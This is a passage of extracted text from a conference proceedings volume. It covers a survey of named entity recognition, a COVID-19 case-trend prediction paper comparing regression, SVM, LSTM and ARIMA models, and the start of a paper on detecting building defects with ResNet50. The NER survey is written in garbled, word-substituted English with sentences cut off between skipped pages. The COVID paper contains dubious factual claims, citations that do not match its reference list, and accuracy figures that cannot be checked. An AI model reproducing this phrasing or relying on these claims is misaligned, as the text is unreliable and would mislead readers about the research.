recent decade. NER can consequently examine the entire articles and reveal the indi-
viduals, associations, and spots talked about in text. Knowing the applicable labels
for every single article help in naturally arranging the articles in all around charac-
terized progressive systems and endorse smooth content disclosure. The pretension
of this paper is to present survey on NER. The prime contribution of this research to
present state-of-the-art NER is systematically reviewed according to techniques used
in NER. This paper also provides tools, datasets, techniques, challenges and future
directions in the field of NER with the aim of providing researchers the substantial
knowledge for further work.
1 Introduction
Named entity recognition (NER) is presumably the initial step towards data extraction
that tries to find and characterize named elements in content into pre-characterized
classes, for example, the names of people, locations, organizations, areas, amounts,
fiscal qualities, rates, and so forth. NER is utilized in numerous fields in Natural
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 817
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_66
818 A. Sharma et al.
Language Processing (NLP). NER not only acts as a standalone tool but also plays
a very important role in various NLP applications like speech recognition, chatbots,
sentiment analysis, text classification, automatic summarization etc.
The other name of NER is entity identification, entity extraction, and entity chunk-
ing. NER is the state of Artificial Intelligence system that works with about the
productivity of the human mind. The system is organized so that it is equipped for
discovering element components from raw information and can help to decide the
classification wherein the component has a place. The process of identifying and
classifying various types of data elements is known as the named entity (NE). The
idea of NE showed up in a situation of NLP application and is a long way from being
linguistically clear and settled.
The expression NE, broadly utilized in information extraction (IE), question answer-
ing or other characteristic language processing applications, was conceived in the
message understanding conferences (MUC) which impacted IE examine in the U.S.
in the 1990s. Around then, MUC concentrated on IE assignments where organized
data of organization exercises and barrier related exercises is extricated from unstruc-
tured content, for example, paper articles. Over the span of framework advancement,
individuals saw that it is imperative to perceive data. Separating these substances
was perceived as one of the significant sub-undertakings of IE. As this undertak-
ing is moderately free, it has been assessed independently in a few unique dialects,
for example Japanese, Chinese and Spanish in multilingual entity tracking venture.
There has been a few assessment based ventures for NE, as one of the undertakings
of Information Retrieval and Extraction Exercise (IREX) in Japan [IREX HP], and
as the mutual undertaking in CoNLL in 2002 furthermore, 2003 for four dialects,
English, German, Dutch and Spanish [CoNLL HP]. In the IREX venture, another
class artifact, for example, “Odyssey” as a book title or “Windows” as an item name,
was added to the first MUC classes. The NE task in MUC was acquired by the
ACE venture in the U.S., where 2 new classifications are included, Geographical and
Political Entities, for example, “France” or “New York” and facility, for example,
“Empire State Building” [1].
Petasis et al. [2] confined the significance of named components: “A NE is a formal
person, place or thing, filling in as a name for a person or thing". This limitation is
legitimized by the outstanding level of formal person, place or thing, spots or things
available in the corpus. “Named" constrained the endeavor to just those substances
for which one or various rigid designators presents to the referent. Rigid designator
described in appropriate names and common terms like organic species besides,
substances. Regardless of the distinctive explanation of NE’s, authorities have shown
up at normal concurrence on the sorts of NEs to see, the most part separate NEs into
two classes: regular NE’s and space explicit NE’s (e.g., proteins, synthetics, and
Named Entity Recognition in Natural Language Processing … 819
From the last two decades, various kinds of topics have pulled in critical consideration
such as Deep Learning (DL) because of their achievement in different areas. DL-
based NER approach with insignificant component building has been growing. In
recent years, an extensive number of studies implement deep learning techniques out
how NER progressively propelled the cutting edge execution. This pattern motivates
us to direct the study to survey the current state or the situation of deep learning
systems in the field of NER look into. By contrasting the decisions of DL designs,
our objective is to distinguish factors influencing NER execution just as problems
and challenges.
NER studies have been developing for a couple of decades. As far as we could
possibly know, there are not many surveys in this field up until now. Apparently the
most settled one was established by Nadeau and Sekine [1] in 2007. Marrero et al. [4]
summed up NER works from the points of view of false notions, difficulties, issues
and furthermore the open doors in the time of 2013.
The pretension of this paper is to present a survey of the various techniques trends
in NER. The remainder of the paper is as follows. The detailed insight of the related
background on the aforementioned study is presented in the next section. Section 3
provides the systematic literature review of related work. Section 4 provides the
challenges and future directions and finally conclusion is in Sect. 5.
2 Related Background
2.1 NER
It is presumably the initial step toward data extraction that tries to find and character-
ize named elements in content into pre-characterized classes, for example, the names
of people, locations, organizations, areas, amounts, fiscal qualities, rates, and so forth.
NER is utilized in numerous fields in NLP. NER acts as an autonomous tool as well
as plays a very important role in various NLP applications like speech recognition,
chatbots, sentiment analysis, text classification, automatic summarization etc.
820 A. Sharma et al.
A tagged or the labeled corpus is the cluster of documents that includes interpretation
of single or might be more than single entity types. Prior to 2005, datasets were mostly
evolved by commenting on news stories with few element types, fitting for coarse-
grained NER undertakings. Starting there onwards, large amount of datasets were
generated which were based on the different types of content origin including various
kind of Wikipedia articles, discussion, and client produced content. The various kinds
of tag types turnsout to be significantly larger e.g., 89 in OntoNotes [5]. The various
progressing NER activities report their display on CoNLL03 and OntoNotes datasets.
The CoNLL [6] datasets comprise of newswire information in four European dialects
Spanish, Dutch, English and German and is labeled with four substance types (PER,
LOC, ORG, MISC). OntoNotes is an additionally testing corpus, containing three
dialects that don’t share contents: Arabic, Chinese and English and contains 18
NER types. GENIA [7] corpus is also used for the task of NER. OntoNotes has
an enormous number of labelled elements. The objective of the OntoNotes venture
was to comment on an enormous corpus, containing different classifications such as
various blogs and the different and more and more group of news with basic data
(linguistic structure and predicate contention structure) and shallow semantics (word
sense connected to a cosmology and coreference). The other corpus for the dataset
is MUC-6 [8] which also used for the task of NER. This corpus contains the 318
clarified Wall Street Journal articles, the scoring programming and the comparing
documentation utilized in the MUC-6 assessment. The importance of MUC-6 corpus
and MUC-6 Additional News Text is that it is used in the replication of assessment.
There are various tools available online for English text. Some of the tools which
can be used for NER are—(i) Natural Language Toolkit (NLTK) [9], (ii) Polyglot
[10], (iii) Stanford CoreNLP [11], (iv) LingPipe [12], (v) Allen NLP [13], and (vi)
ScispaCy [14].
The tool which can be used for NER is NLTK, which is open source library for the
Python programming language. It is the most commonly used platform if working
with human language data using Python. NLTK provides more than 50 corpora and
various lexical resources. NLTK also has libraries for the classification, tokenization,
lemmatization and chunking. It goes with a hands-on control that presents subjects
in computational morphological also as programming nuts and bolts for the Python
Languages because of it makes it reasonable for language experts who have not any
extraordinary data in programming, creators, researchers that are required to plunge
into the computational morphology.
The other tool which is in trend for NER is ScispaCy. ScispaCy is an open source
programming library for advanced NLP. The ScispaCy NER condition utilizes a
Named Entity Recognition in Natural Language Processing … 821
word inserting system utilizing a sub-word highlights and Bloom embedding and 1D
Convolutional Neural Network (CNN). Bloom embedding is like a word installing
and more space streamlined representation. It gives each word and separate repre-
sentation for each particular setting it is in. Whereas 1D CNN is applied over the
information content to group a sentence/word into a group of predetermined cate-
gories.
There are various steps in NER like tokenization, lemmatization, Part-of-Speech
(POS) tagging, and chunking which can be done by using any of these tools. The
steps are:
(i) Tokenization: The basic tokenizer split the text into sentence and sentence
into tokens. For example, the sentence “he is playing cricket" is split into tokens as
[‘he’, ‘is’, ‘playing’, ‘cricket’].
(ii) Lemmatization: Lemmatization is the process in which a word converts to
its root form like caring to care, playing to play etc. Lemmatization helps to identify
the root form or the base form of the word whereas stemming just cut off the ing part
from the word which makes a huge difference. Stem might not be a real or actual
word but lemma always be a real word. In Lemmatization, ‘Caring’ converts into
‘care’ whereas in stemming ‘Caring’ converts into ‘car’.
(iii) POS Tagging: It is used to read the text language and assign some token to
each and every word. Tagging is a sort of grouping that might be characterized as
the programmed task of depiction to the tokens. The descriptor is called tag, which
may speak to one of the grammatical features, semantic data, etc. For example, the
sentence “he is playing cricket" is tagged as [(‘he’, ‘PRP’), (‘is’, ‘VBZ’), (‘playing’,
‘VBG’), (‘cricket’, ‘NN’)].
(iv) Chunking: Chunking is also known as chunk extraction and shallow parsing.
It is the method of extracting the meaningful short phrases from the sentence which is
tagged with POS. It adds the structure in the given sentence which is tagged with the
POS. There is maximum one level between the roots and leaves in shallow parsing
or chunking on the other hand deep parsing consists of more than one level.
The primary usage of chunking is to make a group of noun phrases. The parts
of speech are combined with regular expressions. There are no predefined rules for
chunking but rules can be made as per the need or the requirements.
Several earlier IE and NER systems are based on hand-crafted rules [1]. It employs
domain specific features to identify and classify NE using syntactic-lexical pat-
terns and series of hand-crafted grammatical rules by computational linguists. These
rules work well to extract IE that follows specific patterns. The main drawbacks are
domain-specific and time-consuming due to manual construction of the rules.
Däniken and Cieliebak [24] broadened crafted by Yang’s to allow joint getting
ready on easygoing corpus, and to coordinate the sentence level component portrayal.
Their system got the second spot at the WNUT 2017 shared errand for NER. Zhao
et al. [25] have proposed a perform multiple tasks system with the changing of area,
where the whole association coating is adjusted to different kinds of datasets, and
the conditional random field (CRF) [26] attributes has been handled autonomously.
A critical good situation of Zhao’s model is the cases through discrete dissemina-
tion and improper adjusted explanation guidance are passed out simply in the data
determination process. Lin and Lu [27] proposed a refining system for NER by pre-
senting a three neural adaptation coating: initial one is word adaptation coating and
the another is sentence adaptation coating and the latter is yield adaptation coating.
Various NER models have been developed by using MLP and Softmax as the label
decoder. Softmax is utilized as label decoder to anticipate games in chess games as
a specific NER task in [28]. It takes both contributions from entities and from chess
board (9 × 9 squares with 40 bits of 14 explicit sorts) and predicts 21 named elements
explicit to this game. Content representations and game state embeddings are both
taken care as a softmax layer for the anticipation of named entities utilizing the BIO
label scheme.
Goyal et al. [15] reviewed improvements and advances made in NER however they
avoid ongoing advances of deep learning methods. The short outline recent progress
in NER on portrayls of words in sentence is presented by Yadav and Bethard [29].
This overview focused on the scattered descriptions for input and don’t investigate
the setting encoder and label adapters. The progressing pattern of implementing deep
learning is the task of NER.
An attention tool to progressively choose the amount of data to be utilized from a
character-or word-level section from beginning to end of NER model is executed by
Rei et al. [30]. Zukov-Gregoric et al. [31] learned about the self-thought part in NER,
where the loads are subject to a solitary grouping (instead of association between
two arrangements).
Xu et al. [32] presented a consideration dependent neural NER configuration to
utilize document level overall information particularly, the report-level information
is acquired from records introduced by utilizing the pre-prepared bilateral or duplex
language model with neural deliberation. A powerful and the versatile co-attention
network in the tweets is utilized by Zhang et al. [33]. This versatile co-attention net-
work is a multi-secluded model utilizing co-consideration process. Co-consideration
incorporates visible consideration and printed regard for getting the semantic col-
laboration between different methods.
Named Entity Recognition in Natural Language Processing … 825
4.1 Challenges
be more research on the fine-grained in NER in the particular area regions. There
are numerous troubles in fine-grained NER. One of the tests in fine-grained
NER is the essentially expanding or bringing up in the NE types and in this
way trouble announced by conceding a named substance to have various NE
types. This includes an arrival of the fundamental NER approaches where as
far as possible, along these lines the sorts are recognized simultaneously. It is
sufficient to consider portraying the named substance limit distinguishing proof
as a committed endeavor for the ID of NE limits, while dismissing NE types.
Separation of boundary identification proof and the NE type characterization
enables typical and fiery answers for the cutoff ID which will be shared across
different sorts of areas, and dedicated region explicit techniques for the NE kind
of classification.
(ii) NER with respect to Informal Text with Auxiliary Assets: The performance based
on the Deep Learning NER concerning informal content or client delivered con-
tent remains low so more research is required around there. The assistant assets
are every now and again required for the better comprehension of client created
content. The principle work is the way to get coordinating helper assets for a
NER work on client created content or specific area and the way to reasonably
integrate or interconnect the auxiliary assets in the task of NER.
(iii) Flexibility of NER: The creation of NER models progressively scalable is as yet
a challenging task. The solution is still needed to optimize rapidly increasing
the development of limiting factor when the size of data becomes enlarged [34].
Numerous NER models have just accomplished a better than average execution
however with the cost of huge figuring power. For example ELMo depiction
designate to every word with a 3 × 1024-dimensional vector and the time taking
by model for training was 5 weeks on 32 GPUs [35]. Googles BERT were trained
on 64 cloud TPUs. To balancing the complexity and the creating approaches
would be a guaranteeing course.
5 Conclusion
The named entity recognition (NER) field has been flourishing in the recent decades.
Named entity tasks play a very important role in the natural language technologies.
NER is incessantly enriching due to its major contribution in numerous natural lan-
guage processing (NLP) applications. The aim of this research is to survey the recent
studies on the NER solutions which help the researchers to build a strong base in
this field. This research will give insight to the researchers about evolution of NER,
datasets, tools, techniques that can be employed in NER. It also helps to gain insight
about Challenges in NER for novice researchers. In addition, a review of rule-based,
learning based and hybrid NER systems has been presented. After viewing most of
the paper we found that when supervised learning method is utilized there is the
accessibility of an enormous collection of annotated data and when unsupervised
learning method is used the data is unannotated. Various recent studies in the field of
Named Entity Recognition in Natural Language Processing … 827
References
1. Nadeau, D., & Sekine, S. (2007). A survey of named entity recognition and classification.
Lingvisticae Investigationes, 30(1), 3–26.
2. Petasis, G., Cucchiarelli, A., Velardi, P., Paliouras, G., Karkaletsis, V., & Spyropoulos, C.
D. (2000). Automatic adaptation of proper noun dictionaries through cooperation of machine
learning and probabilistic methods. Proceedings of SIGIR, 128–135.
3. Li, J., Sun, A., Han, J., & Li, C. (2018). A survey on deep learning for named entity recognition.
IEEE Transactions On Knowledge And Data Engineering, 20.
4. Marrero, M., Urbano, J., Sánchez-Cuadrado, S., Morato, J., & Gómez-Berbís, J. M. (2013).
Named entity recognition: Fallacies, challenges and opportunities. Computer Standards &
Interfaces, 35, 482–489.
5. Weischedel, R., Hovy, E., Marcus, M., Palmer, M., Belvin, R., Pradhan, S., Ramshaw, L., &
Xue, N. (2011). OntoNotes: A large training corpus for enhanced processing. In Handbook of
natural language Processing and machine translation: DARPA global autonomous language
exploitation. Springer.
6. Sang, E. F.T . K. (2002). Introduction to the conll-2002 shared task: Language-independent
named entity recognition. In Proceedings of the 6th Conference on Natural Language Learning.
Stroudsburg, PA, USA. Association for Computational Linguistics (Vol. 31, pp. 1–4).
7. Kim, J. D., & Ohta, T. (2003). GENIA corpus-a semantically annotated corpus for bio-
textmining (Vol. 19).
8. Grishman, R., & Sundheim, B. (1996). Message understanding conference-6: A brief history.
In Proceedings of the 16th Conference on Computational Linguistics, COLING (Vol. 1, pp.
466–471).
9. Bird, S., Loper, E., & Klein, E. (2009). Natural language processing with python (Vol. 36, pp.
767–771). O’Reilly Media Inc.
10. Al-Rfou, R., Kulkarni, V., & Perozzi, B. (2014). POLYGLOT-NER: Massive multilingual named
entity recognition (Vol. 1).
11. Manning, C., Surdeanu, M., & Bauer, J. (2014). The Stanford CoreNLP natural language
processing toolkit. Proceedings of 52nd Annual Meeting of the Association for Computational
Linguistics: System Demonstrations (pp. 55–60).
12. Kang, Y., Cai, Z., Tan, C.-W., Huang, Q., & Liu, H. (2020). Natural language processing (NLP)
in management research: A literature review. Journal of Management Analytics, 7(2), 139–172.
13. Gardner, M., Grus, J., Neumann, M., Tafjord, O., Dasigi, P., Liu, N., Peters, M., Schmitz, M.,
& Zettlemoyer, L. (2017). AllenNLP: A deep semantic natural language processing platform.
In Proceedings of Workshop for NLP Open Source Software (NLP-OSS), Technical report (pp.
1–6,).
14. Neumann, M., & King, D. (2019). ScispaCy: Fast and robust models for biomedical natural
language processing. In Proceedings of the BioNLP workshop, 319–327.
15. Goyal, A., Gupta, V., & Kumar, M. (2018). Recent named entity recognition and classification
techniques: A systematic review. Computer Science Review, 29, 21–43.
16. Lin, B. Y., Xu, F., Luo, Z., & Zhu, K. (2017). Multi-channel bilstm-crf model for emerging
named entity recognition in social media. In Proceedings of the 3rd Workshop on Noisy User-
generated Text (pp. 160–165).
17. Peters, M. E., Ammar, W., Bhagavatula, C., & Power, R. (2017). Semisupervised sequence
tagging with bidirectional language models. In Proceedings of ACL (pp. 1756–1765).
828 A. Sharma et al.
18. Collobert, R., Weston, J., Bottou, L., Karlen, M., Kavukcuoglu, K., & Kuksa, P. (2011). Natural
language processing (almost) from scratch. Journal of Machine Learning Research, 12, 2493–
2537.
19. Ju, M., Miwa, M., & Ananiadou, S. (2018). A neural layered model for nested named entity
recognition. Proceedings of NAACL-HLT, 1, 1446–1459.
20. Yang, Z., Salakhutdinov, R., & Cohen, W. (2016). Multi-task cross-lingual sequence tagging
from scratch. arXiv. 2.
21. Rei, M. (2017). Semi-supervised multitask learning for sequence labeling. Proceedings of ACL
(pp. 2121–2130).
22. Nadeau, D., Turney, P. D., & Matwin, S. (2006). Unsupervised named entity recognition:
Generating gazetteers and resolving ambiguity. In Proceedings of the Canadian Society for
Computational Studies of Intelligence (pp. 266–277). Springer.
23. Zhang, S., & Elhadad, N. (2013). Unsupervised biomedical named entity recognition: Experi-
ments with clinical and biological texts. Journal of Biomedical Information, 46, 1088–1098.
24. Däniken, P. V., & Cieliebak, M. (2017)T. ransfer learning and sentence level features for named
entity recognition on tweets. In Proceedings of the 3rd Workshop on Noisy User-generated Text
(pp. 166–171).
25. Zhao, H., Yang, Y., Zhang, Q., & Si, L. (2018). Improve neural entity recognition via multi-task
data selection and constrained decoding. NAACL-HLT, 2, 346–351.
26. Sutton, C., McCallum, A., & Rohanimanesh, K. (2007). Dynamic conditional random fields:
Factorized probabilistic models for labeling and segmenting sequence data. Journal of Machine
Learning Research, 8, 693–723.
27. Lin, B. Y., & Lu, W. (2018). Neural adaptation layers for cross-domain named entity recogni-
tion. Proceedings of AAAI, 12, 2012–2022.
28. Tomori, S., Ninomiya, T., & Mori, S. (2016). Domain specific named entity recognition refer-
ring to the real world by deep neural networks. Proceedings of ACL, 2, 236–242.
29. Yadav, V., & Bethard, S. (2018). A survey on recent advances in named entity recognition from
deep learning models. In Proceedings of COLING (pp. 2145–2158).
30. Rei, M., Crichton, G. K., & Pyysalo, S. (2016). Attending to characters in neural sequence
labeling models. In Proceedings of COLING (pp. 309–318).
31. Zukov-Gregoric, A., Bachrach, Y., Minkovsky, P., Coope, S., & Maksak, B. (2017). Neural
named entity recognition using a selfattention mechanism. In Proceedings of ICTAI (pp. 652–
656).
32. Xu, G., Wang, C., & He, X. (2018). Improving clinical named entity recognition with global
neural attention. In Proceedings of APWeb-WAIM (pp. 264–279).
33. Zhang, Q., Fu, J., Liu, X., & Huang, X. (2018). Adaptive co-attention network for named entity
recognition in tweets. In AAAI.
34. Batmaz, Z., Yurekli, A., Bilge, A., & Kaleli, C. (2018). A review on deep learning for recom-
mender systems: Challenges and remedies. Artificial Intelligence Review, 1–37.
35. Akbik, A., Blythe, D., & Vollgraf, R. (2018). Contextual string embeddings for sequence
labeling. In Proceedings of COLING (pp. 1638–1649).
Assessing Spatiotemporal Transmission
Dynamics of COVID-19 Outbreak Using
AI Analytics
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 829
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_67
830 M. Gupta et al.
dry, and the sunny climate tends to deteriorate it. The coronavirus PH lies between
5.5 and 8.5. It is spread by the virus SARS-CoV-2. It was accepted that it is a microor-
ganism found in bats in 2002; however, it has begun spreading in different creatures
like cats and people. First, it was found in southern China in 2002. Coronavirus
started from Wuhan, China in December 2019. Later, it expanded to the whole of
China and, subsequently, the whole world. In January 2020, WHO announced coron-
avirus as a Public Health Emergency of International Concern (PHEIC), and later in
March 2020, WHO announced it was pandemic, and thus, lockdown started in many
countries. Due to the coronavirus, people with weak immunity are mostly affected,
especially infants, senior citizens, and people with heart disease and diabetes. In our
research work, we have used artificial intelligence (AI) techniques, including linear
regression (LR), support vector machine (SVM), long short-term memory (LSTM),
and auto-regressive integrated moving average (ARIMA) to predict the trend of
COVID-19.
2 Literature Survey
There are various works and research had been performed on coronavirus predic-
tion by using machine learning (ML) algorithms and deep learning (DL), etc. In a
recent research conducted in [1]. Car et al. in May 2020 were to perform the valid
regression model through an AI algorithm using the dataset that they used in their
implementation. The main goal of the model is to discover all the gathered data
together, instead of splitting it into different locations, because ML can give insights
into the factors surrounding the spread of coronavirus and hence allows us to make
accurate predictions. In another paper in [2], Sujath et al. in May 2020 represented
a model that was helpful to analyze the spread of coronavirus. In this, authors have
done multilayer perceptron (MLP), vector autoregression (VAR), and LR strategy
to analyze the disease and movement of coronavirus cases in India. The MLP algo-
rithm showed better prediction outcomes as compared to the LR and VAR technique
utilizing Orange and WEKA. Tuli et al. in May 2020 represented a model which
used Generalized Inverse Weibull distribution, a well-fit can be achieved to make an
analyzed frame [3]. This used a platform like cloud computing for real-time predic-
tion and more accuracy of the virus spread behavior of the pandemic. They select
ML algorithm that can be executed easily on cloud platforms for correct predic-
tion and enterprise growth of reply by the citizens and political parties. Another
recent research in [2], the authors have analyzed the function of ML and AI as one
important procedure in the area of predicting, screening, contact detecting, antici-
pating, and drug advancement for the virus SARS-CoV-2 and its spread. This research
presented the diagnosis using an ML and AI on CT images (1020) of coronavirus,
which included the study on 108 contaminated patients alongside 86 viral pneu-
monia patients, and the authors used the convolutional neural network (Resnet-101)
for radiologist resulted in 83.33%, 86.27 of accuracy and specificity, respectively.
The research presents that 11 pertinent lists are taken out by using the random forest
Assessing Spatiotemporal Transmission Dynamics … 831
model with general correctness of 96.97% and 95.95%, respectively. In yet another
recent contribution, Rustam et al. in May 2020 formulated the ML models to estimate
the number of predicted patients suffered by coronavirus [4]. In this research, authors
used four models, includes least absolute shrinkage, LR, SVM, selection operator
(LASSO), and exponential. In [5], the authors Chaurasia and Pal in July 2020 were
predicting the further spread of this virus in our country by utilizing time-series data
to predict the number of deceased patients globally, and the work included time-
series predictive modeling by using various techniques, searching a best procedure
for analyzing on the coronavirus dataset and using the ARIMA algorithm for future
estimating of deceased rates globally. In paper [6] Khanday et al. in June 2020, they
divided textual clinical dataset into different parts by utilizing ensemble and classical
ML algorithms. They use NLP techniques like term frequency/inverse, report length,
bag of words (BOW), and document frequency for optimal feature engineering. They
used ensemble and traditional ML classifiers for transferring the features. Multino-
mial Naive Bayes and logistic regression showed good results as compared to other
ML models having 96.2% testing accuracy. Burdick et al. have created the model
for fitting “boosted” decision trees by utilizing the XGBoost classifier algorithm [7].
XGBoost classifier implements gradient boosting which uses an ensemble of clas-
sifiers that integrates outcomes from multiple decision trees to generate scores of
predictions. Each tree splits the patient number into little groups, successively. The
splitting continues until the patient reaches the leaf node which is either from one
class or another based on the value of features is above or below some threshold.
Jamshidi et al. in June 2020 gave a response on the spread of the virus by using DL
and AI analytics to achieve the target output which consist of generative adversarial
networks (GANs), extreme learning machine, and LSTM [8]. The main supremacy
of these AI applications is to expedite the procedure of treatment and diagnosis of
the coronavirus ailment.
3 Proposed Methodology
The following section summarizes the dataset and the proposed methodology for
prediction of COVID-19 trend in India.
Table 1 shows the coronavirus data published by the Center of Systems Science
and Engineering (CSSE) at John Hopkins University [9]. The dataset consists of
273 rows and 384 columns shows worldwide instantaneous death, total cases, and
recovery along with latitude and longitude [10]. India, being the second largest in
world population, draws special attention of researchers to predict the COVID-19
trend [11]. Hence, another dataset, shown in Table 2, is extracted from Indian Ministry
832
of Health and Family Affairs containing seven months of coronavirus data in India
from January 30, 2020 to September 2, 2020. This dataset consists of 5861 rows and
9 distinct attributes.
Y = BX + A (1)
In Eq. (1), Y is dependent variable, A & B are linear regression coefficients in (3),
X is an independent variable. The dependent variable refers to final output and X as
the confirmed cases. The goal of linear regression is to minimize the squared of the
residuals between the true prediction and observed prediction. Hence, it translated
to Eq. (4):
E = Y (i) − B X − A (2)
A = Ȳ − B X̄ (3)
2
B̄ = X − X̄ Y (i) − Ȳ / X − X̄ (4)
In Eq. (2), E is the residual or the difference between the predicted and actual
value, Y (i) is the true value of the data point, while Ȳ & X̄ represent the average
value of Y and X .
(2) Support Vector Machine (SVM): A support vector machine (SVM) is a super-
vised learning model used for classification to analyze the data for two-group
classification problems [12]. SVM uses two decision boundaries in the X–Y
graph which are linearly separable which is called a hyperplane. Margin is
the sum of the distances (Dˆ- + Dˆ + ) between the two decision boundaries.
For classifying the data points consider the hyperplane or decision boundary
which has a maximum width margin. Higher the width of the margin is better
Assessing Spatiotemporal Transmission Dynamics … 835
the accuracy. The value of the margin (m), || w || will be inversely proportional,
where w is the set of weight matrices. To maximize the margin, || w || have to
minimize.
||w||2
margin = Minimize (5)
2
There are two variants of SVM algorithms which are commonly used hard SVM
and soft SVM. Hard SVM: If the data is perfectly linearly separable, it is much
beneficial to use the hard SVM formulation that can quickly sketch up the decision
boundary.
y(i) w T X (i) − B ≥ 1 for all 1 < i ≤ n (6)
In the above (6), equation X (i) are the samples or data points and the Y (i) has
the output response where w is normal vector to the hyperplane. There is a second
equation used to handle the outliers, and it has less penalty on misclassified points
which is soft SVM formulation.
||w||2
Minimize +C max 0, 1 − yi w T xi + b (7)
2 i
In the above eq. (7) C is the regularity parameter that balances the margin width and
missed penalty. Thus, the goal of the SVM formulation is to minimize the equation
specified in (7)
(3¢) Auto Regressive Integrated Moving Average (ARIMA): A group of models
that uses time-series data for better understandability and to predict the trends
of future based on its own values, referred as (p, q, d) where p, q, d are non-
negative numeric values which can be used to forecast future values. ARIMA
is a model that uses the dependent relationship between an observed sample
and some number of lagged observations [13, 14]. The step involves differ-
entiating of observed data point in order to make the time series stationary so
that it can be analyzed well. This model uses the dependence between data
and residual error from moving average model applied to lagged observations.
4 Results
In this research, we have used various AI analytics to predict the trend of coronavirus.
The algorithms that we used shown the results with accuracy were LR (98%), SVM
(72.45%), ARIMA (99.87%), and LSTM (42%) for prediction of the coronavirus. It
was observed that the ARIMA model is best as compared to all because it achieves
the maximum accuracy (99.87%). In this section, we have presented the prediction
of total cases of coronavirus by using confirmed cases, recovery, and death cases as
836 M. Gupta et al.
our dominant features. In Fig. 1, we have shown the total active, cured, death cases
in hotspot countries (China, India, United Kingdom, France, US, and Italy). We have
later focused our research of coronavirus trend prediction for India and examined
the timeline of the confirmed, recovered, and death rates due to coronavirus in India
(Fig. 2). Our results show predicted total cases of India from the date, i.e., January
29, 2021 to February 2, 2021, with average 99.87% accuracy. The predicted cases
were found according to confirmed cases from January 24, 2021 to January 28, 2021.
In Fig. 3, we have shown the regression line which we observed, predicted total cases
given date-wise for next 15 days till 19th Feb. In Fig. 4, we have shown the predicted
cases for the next 120 days, first it shows actual data of total cases from Jan 2020 to
Jan 2021. Secondly, it shows the predicted data from Jan to 120 days till May 2021.
5 Conclusion
Our research has presented various artificial intelligence techniques to predict the
trend of coronavirus in India. The models used include LR, SVM, LSTM recur-
rent networks, and ARIMA models. The forecast was done dependent on confirmed,
cured, and deceased cases. The results are also presented graphically for better under-
standability of predicted results. The AI analytics that we used shown the results with
accuracy were LR (98%), SVM (72.45%), ARIMA (99.87%), and LSTM (42%) for
prediction of the coronavirus. Linear regression and ARIMA model give the best
results with maximum accuracy (98 and 99.87%, respectively) and performed better
838 M. Gupta et al.
References
1. Magazzino, C., Mele, M., & Schneider, N. (2021). A Machine Learning approach on the rela-
tionship among solar and wind energy production coal consumption GDP and CO2 emissions.
Renewable Energy, 167, 99–115.
2. Kavadi, D. P., Patan, R., Ramachandran, M., & Gandomi, A. H. (2020). Partial derivative
nonlinear global pandemic machine learning prediction of Covid 19. Chaos, Solitons &
Fractals, 139, 110056.
3. Sharma, S. (2020). Drawing insights from COVID-19-infected patients using CT scan images
and machine learning techniques: A study on 200 patients. Environmental Science and Pollution
Research, 27(29), 37155–37163.
4. Tuli, S., Tuli, S., Tuli, R., & Gill, S. S. (2020). Predicting the growth and trend of COVID-19
pandemic using machine learning and cloud computing. Internet of Things, 11, 100222.
5. Chaurasia, V., & Pal, S. (2020). Covid-19 pandemic: Application of machine learning time
series analysis for prediction of human future. Available at SSRN 3652378.
6. Lalmuanawma, S., Hussain, J., & Chhakchhuak, L. (2020). Applications of machine learning
and artificial intelligence for Covid-19 (SARS-CoV-2) pandemic: A review. Chaos, Solitons
and Fractals, 110059.
7. Rustam, F., Reshi, A. A., Mehmood, A., Ullah, S., On, B.-W., Aslam, W., & Choi, G. S.
(2020). COVID-19 future forecasting using supervised machine learning models. IEEE Access,
8, 101489–101499.
8. Nayak, J., Naik, B., Dinesh, P., Vakula, K., Kameswara Rao, B., Ding, W., & Pelusi, D. (2021).
Intelligent system for COVID-19 prognosis: A state-of-the-art survey. Applied Intelligence,
1–31.
9. Gujral, H., & Sinha, A. (2021). Association between exposure to airborne pollutants and
COVID-19 in Los Angeles, United States with ensemble-based dynamic emission model.
Environmental research, 194, 110704.
10. COVID-19 Data Repository by the Center for Systems Science and Engineering (CSSE) at
Johns Hopkins University.
11. COVID-19 India dataset, data extracted from Ministry of health and family affairs.
12. Sinha, A., & Rathi, M. (2021). COVID-19 prediction using AI analytics for South Korea.
Applied Intelligence, 1–19.
13. Sharma, R. R., Kumar, M., Maheshwari, S., & Ray, K. P. (2020). EVDHM-ARIMA-based
time series forecasting model and its application for COVID-19 cases. IEEE Transactions on
Instrumentation and Measurement, 70, 1–10.
14. Singh, S., Chowdhury, C., Panja, A. K., & Neogy, S. (2021). Time series analysis of COVID-19
data to study the effect of lockdown and unlock in India. Journal of The Institution of Engineers
(India): Series B, 1–7.
Detection of Building Defects Using
Convolutional Neural Networks
Abstract Deep learning has intervened almost in all domains. Apart from various
fields, researchers introduce the implementation of deep learning techniques in
several phases like detecting the damages, predicting the robustness of the repair
mortars, and various other activities. The crucial and significant task of building
maintenance is to detect the damages in the wall surface at an early stage. The issue
is found to be complex when the size of the buildings is huge in number. Hence,
many maintenance engineers and researchers look forward to a better solution. The
objective of this work is to locate the types of several issues that have been encoun-
tered during the construction phase. This work focuses on the four major defects as
spalls, flakes, cracks, and molds. The proposed model worked on ResNet50 on the
dataset that consists of 555 images for training and 176 for the test dataset. Detection
of type of defects is also handled with this model. An accuracy of 81% with a loss
of 0.02 has been obtained through the model deployment. This approach is found to
be robust and provides accurate results.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 839
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_68
840 D. S. S. Bhavani et al.
1 Introduction
The field of civil engineering has an extensive range of issues associated with plan-
ning wastewater treatment plant functioning [1], modeling the stress–strain associa-
tions [2], and other designs of architecture [2] that could be solved by the application
of deep learning algorithms. Among the various activities, the construction of build-
ings has been increased due to the population growth that results in high-rise build-
ings, especially apartments. The construction business is growing tremendously as
par with the technology irrespective of huge costs in building materials. Most of them
construct buildings by mixing concrete powder instead of using sand which is a low
budget to build and to acquire good profits. Due to this, the conditions of the building
